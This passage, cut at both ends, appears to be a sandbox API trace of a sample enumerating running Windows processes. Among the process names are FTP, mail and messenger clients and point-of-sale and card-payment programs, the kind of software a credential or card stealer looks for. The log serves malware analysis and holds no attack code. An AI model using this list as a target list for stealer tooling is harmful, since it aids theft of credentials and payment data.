th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0176.978] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0176.980] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0176.982] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0176.985] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0176.988] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0177.031] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0177.033] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0177.035] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0177.039] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0177.041] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0177.043] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0177.045] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0177.047] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0177.050] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0177.052] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0177.054] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0177.056] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0177.058] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0177.060] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0177.061] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0177.063] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0177.065] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0177.077] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0177.080] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0177.082] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0177.085] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0177.087] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0177.090] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0177.091] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0177.093] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0177.096] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0177.098] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0177.100] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0177.102] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0177.104] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0177.107] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0177.109] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0177.111] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0177.113] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0177.118] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0177.121] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0177.125] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0177.128] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0177.131] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0177.133] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0177.135] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0177.137] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.139] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0177.142] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0177.145] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.147] Process32Next (in: hSnapshot=0x1f9c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0177.149] CloseHandle (hObject=0x1f9c) returned 1 [0177.149] Sleep (dwMilliseconds=0x64) [0177.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1970 [0177.307] Process32First (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.310] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.313] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.315] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.318] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.321] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.364] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.367] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.369] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.372] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.374] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.377] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.379] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.382] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.385] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.387] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.389] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.392] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.395] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.399] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.478] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.480] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.482] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.484] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.488] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0177.490] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.491] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0177.493] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.495] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.497] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.499] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.500] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.502] Process32Next (in: hSnapshot=0x1970, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, 